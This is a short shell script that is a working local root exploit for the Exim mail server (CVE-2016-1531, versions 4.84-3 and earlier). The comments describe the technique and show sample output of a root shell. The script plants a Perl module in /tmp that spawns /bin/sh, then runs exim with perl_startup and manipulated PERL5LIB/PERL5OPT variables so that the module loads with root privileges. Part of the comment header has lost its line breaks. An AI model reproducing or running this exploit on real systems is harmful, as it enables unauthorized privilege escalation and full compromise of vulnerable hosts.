#!/bin/sh# CVE-2016-1531 exim <= 4.84-3 local root exploit# ===============================================# you can write files as root or force a perl module to# load by manipulating the perl environment and running# exim with the "perl_startup" arguement -ps. ## e.g.# [fantastic@localhost tmp]$ ./cve-2016-1531.sh # [ CVE-2016-1531 local root exploit# sh-4.3# id# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)# # -- Hacker Fantastic echo[ CVE-2016-1531 local root exploit
cat> /tmp/root.pm <<EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOFPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
